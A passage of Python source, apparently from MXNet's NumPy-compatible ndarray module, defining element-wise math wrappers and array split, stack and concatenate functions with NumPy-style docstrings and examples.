    >>> x = np.array([1, 2., 3.33])
    >>> np.reciprocal(x)
    array([1.       , 0.5      , 0.3003003])
    Notes
    -----
    .. note::
        This function is not designed to work with integers.
    For integer arguments with absolute value larger than 1 the result is
    always zero because of the way Python handles integer division. For
    integer zero the result is an overflow.
    The output `ndarray` has the same `ctx` as the input `ndarray`.
    Differences from the official `numpy.reciprocal`:
    - Only ndarray and scalar are supported for now.
    - The `where` argument is not supported.
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    return _unary_func_helper(x, _npi.reciprocal, _np.reciprocal, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def square(x, out=None, **kwargs):
    r"""
    Return the element-wise square of the input.
    Parameters
    ----------
    x : ndarray or scalar
        The values whose squares are required.
    out : ndarray or None, optional
        Where to store the result. When given, its shape must match the
        input's; when omitted or None, a new array is allocated.
    Returns
    -------
    y : ndarray or scalar
        Same shape and type as `x`. A scalar if `x` is a scalar.
    Examples
    --------
    >>> np.square(2.)
    4.0
    >>> x = np.array([1, 2., -1])
    >>> np.square(x)
    array([1., 4., 1.])
    Notes
    -----
    The output `ndarray` has the same `ctx` as the input `ndarray`.
    Differences from the official `numpy.square`:
    - Only ndarray and scalar are supported for now.
    - The `where` argument is not supported.
    - Complex input is not supported.
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    squared = _unary_func_helper(x, _npi.square, _np.square, out=out, **kwargs)
    return squared
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def negative(x, out=None, **kwargs):
    r"""
    Numerical negative, element-wise.
    Parameters
    ----------
    x : ndarray or scalar
        Input array.
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored.
    Returns
    -------
    y : ndarray or scalar
        Returned array or scalar: ``y = -x``. A scalar if `x` is a scalar.
    Examples
    --------
    >>> np.negative(1)
    -1
    """
    # NOTE: extra kwargs are intentionally not forwarded here, matching the
    # original implementation of this wrapper.
    return _unary_func_helper(x, _npi.negative, _np.negative, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def fix(x, out=None, **kwargs):
    r"""
    Round an array of floats element-wise to the nearest integer towards zero.
    The rounded values are returned as floats.
    Parameters
    ----------
    x : ndarray
        An array of floats to be rounded.
    out : ndarray, optional
        Output array.
    Returns
    -------
    y : ndarray of floats
        The rounded values.
    Examples
    --------
    >>> np.fix(3.14)
    3.0
    """
    # NOTE: extra kwargs are intentionally not forwarded here, matching the
    # original implementation of this wrapper.
    return _unary_func_helper(x, _npi.fix, _np.fix, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def tan(x, out=None, **kwargs):
    r"""
    Compute tangent element-wise.
    Equivalent to ``np.sin(x)/np.cos(x)`` element-wise.
    Parameters
    ----------
    x : ndarray
        Input array.
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it must
        have a shape the inputs broadcast to; if omitted or None, a new
        array is allocated. A tuple (possible only as a keyword argument)
        must have length equal to the number of outputs.
    where : ndarray, optional
        True positions indicate where to compute the ufunc; False positions
        leave the output value alone.
    Returns
    -------
    y : ndarray
        The corresponding tangent values. A scalar if `x` is a scalar.
    Examples
    --------
    >>> np.tan(0.5)
    0.5463024898437905
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    return _unary_func_helper(x, _npi.tan, _np.tan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def ceil(x, out=None, **kwargs):
    r"""
    Return the ceiling of the input, element-wise.
    The ceil of the ndarray `x` is the smallest integer `i`, such that
    `i >= x`. It is often denoted as :math:`\lceil x \rceil`.
    Parameters
    ----------
    x : ndarray or scalar
        Input array.
    out : ndarray or None
        Where to store the result. When given, its shape must match what the
        inputs fill into; when omitted or None, a new array is allocated.
        Output and input must share the same dtype.
    Returns
    -------
    y : ndarray or scalar
        The ceiling of each element in `x`, with `float` dtype.
        A scalar if `x` is a scalar.
    Examples
    --------
    >>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
    >>> np.ceil(a)
    array([-1., -1., -0.,  1.,  2.,  2.,  2.])
    >>> # when the out parameter is used, both x and out must be ndarrays
    >>> a = np.array(1)
    >>> np.ceil(np.array(3.5), a)
    array(4.)
    >>> a
    array(4.)
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    result = _unary_func_helper(x, _npi.ceil, _np.ceil, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def floor(x, out=None, **kwargs):
    r"""
    Return the floor of the input, element-wise.
    The floor of the ndarray `x` is the largest integer `i`, such that
    `i <= x`. It is often denoted as :math:`\lfloor x \rfloor`.
    Parameters
    ----------
    x : ndarray or scalar
        Input array.
    out : ndarray or None
        Where to store the result. When given, its shape must match what the
        inputs fill into; when omitted or None, a new array is allocated.
        Output and input must share the same dtype.
    Returns
    -------
    y : ndarray or scalar
        The floor of each element in `x`, with `float` dtype.
        A scalar if `x` is a scalar.
    Examples
    --------
    >>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
    >>> np.floor(a)
    array([-2., -2., -1.,  0.,  1.,  1.,  2.])
    >>> # when the out parameter is used, both x and out must be ndarrays
    >>> a = np.array(1)
    >>> np.floor(np.array(3.5), a)
    array(3.)
    >>> a
    array(3.)
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    result = _unary_func_helper(x, _npi.floor, _np.floor, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def bitwise_not(x, out=None, **kwargs):
    r"""
    Compute bit-wise inversion, or bit-wise NOT, element-wise.
    The bit-wise NOT of the underlying binary representation of the integers
    in the input array is computed. This ufunc implements the C/Python
    operator ``~``.
    Parameters
    ----------
    x : array_like
        Only integer and boolean types are handled.
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned. A tuple (possible only as a
        keyword argument) must have length equal to the number of outputs.
    Returns
    -------
    out : ndarray or scalar
        Result. A scalar if `x` is a scalar.
    See Also
    --------
    bitwise_and, bitwise_or, bitwise_xor
    logical_not
    binary_repr :
        Return the binary representation of the input number as a string.
    Examples
    --------
    13 is represented by ``00001101``; its bit-wise NOT is:
    >>> x = np.invert(np.array(13, dtype=np.uint8))
    >>> x
    242
    >>> np.binary_repr(x, width=8)
    '11110010'
    Notes
    -----
    `bitwise_not` is an alias for `invert`:
    >>> np.bitwise_not is np.invert
    True
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def invert(x, out=None, **kwargs):
    r"""
    Compute bit-wise inversion, or bit-wise NOT, element-wise.
    The bit-wise NOT of the underlying binary representation of the integers
    in the input array is computed. This ufunc implements the C/Python
    operator ``~``.
    Parameters
    ----------
    x : array_like
        Only integer and boolean types are handled.
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned. A tuple (possible only as a
        keyword argument) must have length equal to the number of outputs.
    Returns
    -------
    out : ndarray or scalar
        Result. A scalar if `x` is a scalar.
    See Also
    --------
    bitwise_and, bitwise_or, bitwise_xor
    logical_not
    binary_repr :
        Return the binary representation of the input number as a string.
    Examples
    --------
    13 is represented by ``00001101``; its bit-wise NOT is:
    >>> x = np.invert(np.array(13, dtype=np.uint8))
    >>> x
    242
    >>> np.binary_repr(x, width=8)
    '11110010'
    Notes
    -----
    `bitwise_not` is an alias for `invert`:
    >>> np.bitwise_not is np.invert
    True
    """
    # Same implementation as bitwise_not: the two names are aliases.
    return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def trunc(x, out=None, **kwargs):
    r"""
    Return the truncated value of the input, element-wise.
    The truncated value of the scalar `x` is the nearest integer `i` which
    is closer to zero than `x` is. In short, the fractional part of the
    signed number `x` is discarded.
    Parameters
    ----------
    x : ndarray or scalar
        Input data.
    out : ndarray or None, optional
        A location into which the result is stored.
    Returns
    -------
    y : ndarray or scalar
        The truncated value of each element in `x`.
        A scalar if `x` is a scalar.
    Notes
    -----
    Differences from the official numpy.trunc:
    - The `where` parameter (which selects where to compute) is not supported.
    - No automatic type casting: the dtype of `out` must match the expected one.
    - No automatic broadcasting: the shape of `out` must match the expected one.
    - If `x` is a plain Python numeric, the result is not stored in `out`.
    Examples
    --------
    >>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
    >>> np.trunc(a)
    array([-1., -1., -0.,  0.,  1.,  1.,  2.])
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    return _unary_func_helper(x, _npi.trunc, _np.trunc, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def logical_not(x, out=None, **kwargs):
    r"""
    Compute the truth value of NOT x element-wise.
    Parameters
    ----------
    x : ndarray or scalar
        Logical NOT is applied to the elements of `x`.
    out : ndarray or None, optional
        A location into which the result is stored.
    Returns
    -------
    y : bool or ndarray of bool
        Boolean result with the same shape as `x` of the NOT operation
        on elements of `x`. A scalar if `x` is a scalar.
    Notes
    -----
    Differences from the official numpy.logical_not:
    - The `where` parameter (which selects where to compute) is not supported.
    - No automatic type casting: the dtype of `out` must match the expected one.
    - No automatic broadcasting: the shape of `out` must match the expected one.
    - If `x` is a plain Python numeric, the result is not stored in `out`.
    Examples
    --------
    >>> x= np.array([True, False, 0, 1])
    >>> np.logical_not(x)
    array([False,  True,  True, False])
    >>> x = np.arange(5)
    >>> np.logical_not(x<3)
    array([False, False, False,  True,  True])
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    negated = _unary_func_helper(x, _npi.logical_not, _np.logical_not, out=out, **kwargs)
    return negated
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arcsinh(x, out=None, **kwargs):
    r"""
    Inverse hyperbolic sine, element-wise.
    Parameters
    ----------
    x : ndarray or scalar
        Input array.
    out : ndarray or None, optional
        A location into which the result is stored.
    Returns
    -------
    arcsinh : ndarray
        Array of the same shape as `x`.
        This is a scalar if `x` is a scalar.
    Notes
    -----
    `arcsinh` is a multivalued function: for each `x` there are infinitely
    many numbers `z` such that `sinh(z) = x`.
    For real-valued input data types, `arcsinh` always returns real output.
    For each value that cannot be expressed as a real number or infinity, it
    yields ``nan`` and sets the `invalid` floating point error flag.
    This function differs from the original numpy.arcsinh in the following aspects:
    - Do not support `where`, a parameter in numpy which indicates where to calculate.
    - Do not support complex-valued input.
    - Cannot cast type automatically. DType of `out` must be same as the expected one.
    - Cannot broadcast automatically. Shape of `out` must be same as the expected one.
    - If `x` is plain python numeric, the result won't be stored in out.
    Examples
    --------
    >>> np.arcsinh(0.0)
    0.0
    """
    return _unary_func_helper(x, _npi.arcsinh, _np.arcsinh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arccosh(x, out=None, **kwargs):
    r"""
    Inverse hyperbolic cosine, element-wise.
    Parameters
    ----------
    x : ndarray or scalar
        Input array.
    out : ndarray or None, optional
        A location into which the result is stored.
    Returns
    -------
    arccosh : ndarray
        Array of the same shape as `x`. A scalar if `x` is a scalar.
    Notes
    -----
    `arccosh` is a multivalued function: for each `x` there are infinitely
    many numbers `z` such that ``cosh(z) = x``.
    For real-valued dtypes the output is always real; values with no real
    answer yield ``nan`` and set the `invalid` floating point error flag.
    Differences from the official numpy.arccosh:
    - The `where` parameter (which selects where to compute) is not supported.
    - Complex-valued input is not supported.
    - No automatic type casting: the dtype of `out` must match the expected one.
    - No automatic broadcasting: the shape of `out` must match the expected one.
    - If `x` is a plain Python numeric, the result is not stored in `out`.
    Examples
    --------
    >>> a = np.array([3.2, 5.0])
    >>> np.arccosh(a)
    array([1.8309381, 2.2924316])
    >>> np.arccosh(1)
    0.0
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    return _unary_func_helper(x, _npi.arccosh, _np.arccosh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arctanh(x, out=None, **kwargs):
    r"""
    Inverse hyperbolic tangent, element-wise.
    Parameters
    ----------
    x : ndarray or scalar
        Input array.
    out : ndarray or None, optional
        A location into which the result is stored.
    Returns
    -------
    arctanh : ndarray
        Array of the same shape as `x`. A scalar if `x` is a scalar.
    Notes
    -----
    `arctanh` is a multivalued function: for each `x` there are infinitely
    many numbers `z` such that ``tanh(z) = x``.
    For real-valued dtypes the output is always real; values with no real
    answer yield ``nan`` and set the `invalid` floating point error flag.
    Differences from the official numpy.arctanh:
    - The `where` parameter (which selects where to compute) is not supported.
    - Complex-valued input is not supported.
    - No automatic type casting: the dtype of `out` must match the expected one.
    - No automatic broadcasting: the shape of `out` must match the expected one.
    - If `x` is a plain Python numeric, the result is not stored in `out`.
    Examples
    --------
    >>> a = np.array([0.0, -0.5])
    >>> np.arctanh(a)
    array([0., -0.54930615])
    >>> np.arctanh(0.0)
    0.0
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    return _unary_func_helper(x, _npi.arctanh, _np.arctanh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
def tile(A, reps):
    r"""
    Construct an array by repeating A the number of times given by reps.
    If `reps` has length ``d``, the result will have dimension of
    ``max(d, A.ndim)``.
    If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new
    axes. So a shape (3,) array is promoted to (1, 3) for 2-D replication,
    or shape (1, 1, 3) for 3-D replication. If this is not the desired
    behavior, promote `A` to d-dimensions manually before calling this
    function.
    If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it.
    Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as
    (1, 1, 2, 2).
    Parameters
    ----------
    A : ndarray or scalar
        An input array or a scalar to repeat.
    reps : a single integer or tuple of integers
        The number of repetitions of `A` along each axis.
    Returns
    -------
    c : ndarray
        The tiled output array.
    Examples
    --------
    >>> a = np.array([0, 1, 2])
    >>> np.tile(a, 2)
    array([0., 1., 2., 0., 1., 2.])
    >>> np.tile(a, (2, 2))
    array([[0., 1., 2., 0., 1., 2.],
           [0., 1., 2., 0., 1., 2.]])
    >>> np.tile(a, (2, 1, 2))
    array([[[0., 1., 2., 0., 1., 2.]],
           [[0., 1., 2., 0., 1., 2.]]])
    >>> b = np.array([[1, 2], [3, 4]])
    >>> np.tile(b, 2)
    array([[1., 2., 1., 2.],
           [3., 4., 3., 4.]])
    >>> np.tile(b, (2, 1))
    array([[1., 2.],
           [3., 4.],
           [1., 2.],
           [3., 4.]])
    >>> c = np.array([1,2,3,4])
    >>> np.tile(c,(4,1))
    array([[1., 2., 3., 4.],
           [1., 2., 3., 4.],
           [1., 2., 3., 4.],
           [1., 2., 3., 4.]])
    Scalar as input:
    >>> np.tile(2, 3)
    array([2, 2, 2]) # repeating integer `2`
    """
    return _unary_func_helper(A, _npi.tile, _np.tile, reps=reps)
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def split(ary, indices_or_sections, axis=0):
    """
    Split an array into multiple sub-arrays.
    Parameters
    ----------
    ary : ndarray
        Array to be divided into sub-arrays.
    indices_or_sections : int or 1-D python tuple, list or set.
        An integer N divides the array into N equal pieces along `axis`;
        an error is raised if an equal division is impossible.
        A 1-D sequence of sorted integers gives the positions along `axis`
        where the array is cut. For example, ``[2, 3]`` with ``axis=0``
        produces
        - ary[:2]
        - ary[2:3]
        - ary[3:]
        An index past the end of the axis yields an empty sub-array.
    axis : int, optional
        The axis along which to split, default is 0.
    Returns
    -------
    sub-arrays : list of ndarrays
        A list of sub-arrays.
    Raises
    ------
    ValueError
        If an integer `indices_or_sections` does not evenly divide the axis.
    """
    size_along_axis = ary.shape[axis]
    if isinstance(indices_or_sections, integer_types):
        num_sections = indices_or_sections
        if size_along_axis % num_sections:
            raise ValueError('array split does not result in an equal division')
        step = size_along_axis // num_sections
        # Convert the section count into explicit cut positions.
        split_points = [step * i for i in range(num_sections)]
    elif isinstance(indices_or_sections, (list, set, tuple)):
        split_points = [0] + list(indices_or_sections)
    else:
        raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
    pieces = _npi.split(ary, split_points, axis, False)
    assert isinstance(pieces, list), 'Output of split should be list,' \
        ' got a return type {}'.format(type(pieces))
    return pieces
# pylint: enable=redefined-outer-name
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def array_split(ary, indices_or_sections, axis=0):
    """Split an array into multiple sub-arrays.
    An integer `indices_or_sections` N divides the array into N pieces along
    `axis`; when the axis length l is not a multiple of n, the result is
    l % n sub-arrays of size l//n + 1 followed by sub-arrays of size l//n.
    A 1-D sequence of sorted integers gives the positions along `axis` where
    the array is cut. For example, ``[2, 3]`` with ``axis=0`` produces
    - ary[:2]
    - ary[2:3]
    - ary[3:]
    An index past the end of the axis yields an empty sub-array.
    Parameters
    ----------
    ary : ndarray
        Array to be divided into sub-arrays.
    indices_or_sections : int or 1-D Python tuple, list or set.
        Param used to determine the number and size of the subarray.
    axis : int, optional
        The axis along which to split, default is 0.
    Returns
    -------
    sub-arrays : list of ndarrays
        A list of sub-arrays.
    Examples
    --------
    >>> x = np.arange(9.0)
    >>> np.array_split(x, 3)
    [array([0., 1., 2.]), array([3., 4., 5.]), array([6., 7., 8.])]
    >>> np.array_split(x, [3, 5, 6, 8])
    [array([0., 1., 2.]), array([3., 4.]), array([5.]), array([6., 7.]), array([])]
    >>> x = np.arange(8.0)
    >>> np.array_split(x, 3)
    [array([0., 1., 2.]), array([3., 4., 5.]), array([6., 7.])]
    >>> x = np.arange(7.0)
    >>> np.array_split(x, 3)
    [array([0., 1., 2.]), array([3., 4.]), array([5., 6.])]
    """
    # Exactly one of split_points / num_sections carries the request; the
    # backend operator receives both and picks the non-empty/non-zero one.
    split_points = []
    num_sections = 0
    if isinstance(indices_or_sections, integer_types):
        num_sections = indices_or_sections
    elif isinstance(indices_or_sections, (list, set, tuple)):
        split_points = [0] + list(indices_or_sections)
    else:
        raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
    pieces = _npi.split(ary, split_points, axis, False, num_sections)
    return pieces if isinstance(pieces, list) else [pieces]
# pylint: enable=redefined-outer-name
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def hsplit(ary, indices_or_sections):
    """Split an array into multiple sub-arrays horizontally (column-wise).
    This is equivalent to ``split`` with ``axis=0`` if ``ary`` has one
    dimension, and otherwise that with ``axis=1``.
    Parameters
    ----------
    ary : ndarray
        Array to be divided into sub-arrays.
    indices_or_sections : int, list of ints or tuple of ints.
        An integer N divides the array into N equal pieces along the axis;
        an error is raised if an equal division is impossible.
        A list of sorted integers gives the positions along the axis where
        the array is cut. Every index must be less than or equal to the
        dimension of the array along the axis, otherwise an error is raised.
    Returns
    -------
    sub-arrays : list of ndarrays
        A list of sub-arrays.
    Notes
    ------
    - An integer `indices_or_sections` that does not evenly divide the axis
      raises a ValueError.
    - An integer `indices_or_sections` equal to 1 raises an error, because a
      single output from split is not supported yet.
    See Also
    --------
    split : Split an array into multiple sub-arrays of equal size.
    Examples
    --------
    >>> x = np.arange(16.0).reshape(4, 4)
    >>> x
    array([[ 0.,  1.,  2.,  3.],
           [ 4.,  5.,  6.,  7.],
           [ 8.,  9., 10., 11.],
           [12., 13., 14., 15.]])
    >>> np.hsplit(x, 2)
    [array([[ 0.,  1.],
           [ 4.,  5.],
           [ 8.,  9.],
           [12., 13.]]),
    array([[ 2.,  3.],
           [ 6.,  7.],
           [10., 11.],
           [14., 15.]])]
    >>> np.hsplit(x, [3, 6])
    [array([[ 0.,  1.,  2.],
           [ 4.,  5.,  6.],
           [ 8.,  9., 10.],
           [12., 13., 14.]]),
    array([[ 3.],
           [ 7.],
           [11.],
           [15.]]),
    array([], shape=(4, 0), dtype=float32)]
    With a higher dimensional array the split is still along the second axis.
    >>> x = np.arange(8.0).reshape(2, 2, 2)
    >>> x
    array([[[ 0.,  1.],
            [ 2.,  3.]],
           [[ 4.,  5.],
            [ 6.,  7.]]])
    >>> np.hsplit(x, 2)
    [array([[[ 0.,  1.]],
           [[ 4.,  5.]]]),
    array([[[ 2.,  3.]],
           [[ 6.,  7.]]])]
    If ``ary`` has one dimension, 'axis' = 0.
    >>> x = np.arange(4)
    array([0., 1., 2., 3.])
    >>> np.hsplit(x, 2)
    [array([0., 1.]), array([2., 3.])]
    If you want to produce an empty sub-array, you can see an example.
    >>> np.hsplit(x, [2, 2])
    [array([0., 1.]), array([], dtype=float32), array([2., 3.])]
    """
    if not ary.shape:
        raise ValueError('hsplit only works on arrays of 1 or more dimensions')
    # Exactly one of split_points / num_sections carries the request.
    split_points = []
    num_sections = 0
    if isinstance(indices_or_sections, integer_types):
        num_sections = indices_or_sections
    elif isinstance(indices_or_sections, (list, set, tuple)):
        split_points = [0] + list(indices_or_sections)
    else:
        raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
    pieces = _npi.hsplit(ary, split_points, 1, False, num_sections)
    return pieces if isinstance(pieces, list) else [pieces]
# pylint: enable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def vsplit(ary, indices_or_sections):
    r"""
    vsplit(ary, indices_or_sections)
    Split an array into multiple sub-arrays vertically (row-wise).
    ``vsplit`` is equivalent to ``split`` with `axis=0` (default): the array is always split
    along the first axis regardless of the array dimension.
    Parameters
    ----------
    ary : ndarray
        Array to be divided into sub-arrays.
    indices_or_sections : int or 1 - D Python tuple, list or set.
        An integer N divides the array into N equal pieces along axis 0;
        an error is raised if an equal division is impossible.
        A 1-D sequence of sorted integers gives the positions along axis 0
        where the array is cut. For example, ``[2, 3]`` produces
        - ary[:2]
        - ary[2:3]
        - ary[3:]
        An index past the end of axis 0 raises an error.
    Returns
    -------
    sub-arrays : list of ndarrays
        A list of sub-arrays.
    See Also
    --------
    split : Split an array into multiple sub-arrays of equal size.
    Notes
    -------
    Differences from the official numpy version:
    - Currently the parameter ``indices_or_sections`` does not accept an
      ndarray, only a scalar, tuple or list.
    - In ``indices_or_sections``, an index past the end of axis 0 raises
      an error instead of producing an empty sub-array.
    Examples
    --------
    >>> x = np.arange(16.0).reshape(4, 4)
    >>> x
    array([[  0.,   1.,   2.,   3.],
           [  4.,   5.,   6.,   7.],
           [  8.,   9.,  10.,  11.],
           [ 12.,  13.,  14.,  15.]])
    >>> np.vsplit(x, 2)
    [array([[0., 1., 2., 3.],
            [4., 5., 6., 7.]]), array([[ 8.,  9., 10., 11.],
            [12., 13., 14., 15.]])]
    With a higher dimensional array the split is still along the first axis.
    >>> x = np.arange(8.0).reshape(2, 2, 2)
    >>> x
    array([[[ 0.,  1.],
            [ 2.,  3.]],
           [[ 4.,  5.],
            [ 6.,  7.]]])
    >>> np.vsplit(x, 2)
    [array([[[0., 1.],
            [2., 3.]]]), array([[[4., 5.],
            [6., 7.]]])]
    """
    # Guard first, then delegate to split() along the first axis.
    if len(ary.shape) >= 2:
        return split(ary, indices_or_sections, 0)
    raise ValueError("vsplit only works on arrays of 2 or more dimensions")
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def dsplit(ary, indices_or_sections):
    """
    Split array into multiple sub-arrays along the 3rd axis (depth).
    Please refer to the `split` documentation. `dsplit` is equivalent
    to `split` with ``axis=2``, the array is always split along the third
    axis provided the array dimension is greater than or equal to 3.
    Parameters
    ----------
    ary : ndarray
        Array to be divided into sub-arrays.
    indices_or_sections : int or 1 - D Python tuple, list or set.
        An integer N divides the array into N equal pieces along axis 2;
        an error is raised if an equal division is impossible.
        A 1-D sequence of sorted integers gives the positions along axis 2
        where the array is cut. For example, ``[2, 3]`` produces
        - ary[:, :, :2]
        - ary[:, :, 2:3]
        - ary[:, :, 3:]
        An index past the end of axis 2 raises an error.
    Examples
    --------
    >>> x = np.arange(16.0).reshape(2, 2, 4)
    >>> x
    array([[[ 0.,  1.,  2.,  3.],
            [ 4.,  5.,  6.,  7.]],
           [[ 8.,  9., 10., 11.],
            [12., 13., 14., 15.]]])
    >>> np.dsplit(x, 2)
    [array([[[ 0.,  1.],
            [ 4.,  5.]],
           [[ 8.,  9.],
            [12., 13.]]]), array([[[ 2.,  3.],
            [ 6.,  7.]],
           [[10., 11.],
            [14., 15.]]])]
    >>> np.dsplit(x, np.array([3, 6]))
    [array([[[ 0.,  1.,  2.],
            [ 4.,  5.,  6.]],
           [[ 8.,  9., 10.],
            [12., 13., 14.]]]),
    array([[[ 3.],
            [ 7.]],
           [[11.],
            [15.]]]),
    array([], shape=(2, 2, 0), dtype=float64)]
    """
    # Guard first, then delegate to split() along the third axis.
    if len(ary.shape) >= 3:
        return split(ary, indices_or_sections, 2)
    raise ValueError('dsplit only works on arrays of 3 or more dimensions')
# pylint: enable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def concatenate(seq, axis=0, out=None):
    """
    Join a sequence of arrays along an existing axis.
    Parameters
    ----------
    a1, a2, ... : sequence of ndarray
        The arrays must have the same shape, except in the dimension
        corresponding to `axis` (the first, by default).
    axis : int, optional
        The axis along which the arrays will be joined. If axis is None,
        arrays are flattened before use. Default is 0.
    out : ndarray, optional
        If provided, the destination to place the result. The shape must be
        correct, matching that of what concatenate would have returned if no
        out argument were specified.
    Returns
    -------
    res : ndarray
        The concatenated array.
    Examples
    --------
    >>> a = np.array([[1, 2], [3, 4]])
    >>> b = np.array([[5, 6]])
    >>> np.concatenate((a, b), axis=0)
    array([[1., 2.],
           [3., 4.],
           [5., 6.]])
    >>> np.concatenate((a, b), axis=None)
    array([1., 2., 3., 4., 5., 6.])
    >>> np.concatenate((a, b.T), axis=1)
    array([[1., 2., 5.],
           [3., 4., 6.]])
    """
    # The backend operator takes the arrays as positional arguments.
    joined = _npi.concatenate(*seq, axis=axis, out=out)
    return joined
@set_module('mxnet.ndarray.numpy')
def append(arr, values, axis=None):  # pylint: disable=redefined-outer-name
    """
    Append values to the end of an array.

    Parameters
    ----------
    arr : ndarray
        Values are appended to a copy of this array.
    values : ndarray
        Appended to a copy of `arr`.  Must have `arr`'s shape except
        along `axis`; when `axis` is None, any shape is accepted and
        both inputs are flattened first.
    axis : int, optional
        The axis along which `values` are appended.  When not given,
        both `arr` and `values` are flattened before use.

    Returns
    -------
    append : ndarray
        A freshly allocated copy of `arr` with `values` appended along
        `axis`; the operation never happens in place.

    Examples
    --------
    >>> np.append(np.array([1, 2, 3]), np.array([[4, 5, 6],[7, 8, 9]]))
    array([1., 2., 3., 4., 5., 6., 7., 8., 9.])
    >>> np.append(np.array([[1, 2, 3], [4, 5, 6]]), np.array([[7, 8, 9]]), axis=0)
    array([[1., 2., 3.],
           [4., 5., 6.],
           [7., 8., 9.]])
    """
    # Appending is simply a two-operand concatenation.
    return _npi.concatenate(arr, values, axis=axis, out=None)
@set_module('mxnet.ndarray.numpy')
def stack(arrays, axis=0, out=None):
    """Join a sequence of arrays along a new axis.

    `axis` gives the index of the new dimension in the result: ``axis=0``
    makes it the first dimension, ``axis=-1`` the last.

    Parameters
    ----------
    arrays : sequence of ndarray
        Each array must have the same shape.
    axis : int, optional
        Position of the new axis in the stacked result.
    out : ndarray, optional
        Destination for the result; must have the shape stack would
        otherwise return.

    Returns
    -------
    stacked : ndarray
        Has one more dimension than the input arrays.
    """
    # Reject indexable-but-not-iterable inputs before expanding them.
    if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
        raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
    return _npi.stack(*list(arrays), axis=axis, out=out)
@set_module('mxnet.ndarray.numpy')
def vstack(arrays, out=None):
    r"""Stack arrays in sequence vertically (row wise).

    Equivalent to concatenation along the first axis after reshaping
    1-D arrays of shape ``(N,)`` to ``(1, N)``.  Rebuilds arrays divided
    by `vsplit`.  Most useful for arrays of up to 3 dimensions; see
    `concatenate` and `stack` for more general operations.

    Parameters
    ----------
    arrays : sequence of ndarrays
        Must share the same shape along all but the first axis; 1-D
        arrays must have the same length.

    Returns
    -------
    stacked : ndarray
        The stacked result, at least 2-D.

    Examples
    --------
    >>> a = np.array([1, 2, 3])
    >>> b = np.array([2, 3, 4])
    >>> np.vstack((a, b))
    array([[1., 2., 3.],
           [2., 3., 4.]])
    >>> a = np.array([[1], [2], [3]])
    >>> b = np.array([[2], [3], [4]])
    >>> np.vstack((a, b))
    array([[1.],
           [2.],
           [3.],
           [2.],
           [3.],
           [4.]])
    """
    # Reject indexable-but-not-iterable inputs before expanding them.
    if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
        raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
    return _npi.vstack(*list(arrays))
@set_module('mxnet.ndarray.numpy')
def row_stack(arrays):
    r"""Stack arrays in sequence vertically (row wise); alias of `vstack`.

    Equivalent to concatenation along the first axis after reshaping
    1-D arrays of shape ``(N,)`` to ``(1, N)``.  Rebuilds arrays divided
    by `vsplit`.  See `concatenate` and `stack` for more general
    stacking operations.

    Parameters
    ----------
    arrays : sequence of ndarrays
        Must share the same shape along all but the first axis; 1-D
        arrays must have the same length.

    Returns
    -------
    stacked : ndarray
        The stacked result, at least 2-D.

    Examples
    --------
    >>> a = np.array([1, 2, 3])
    >>> b = np.array([2, 3, 4])
    >>> np.row_stack((a, b))
    array([[1., 2., 3.],
           [2., 3., 4.]])
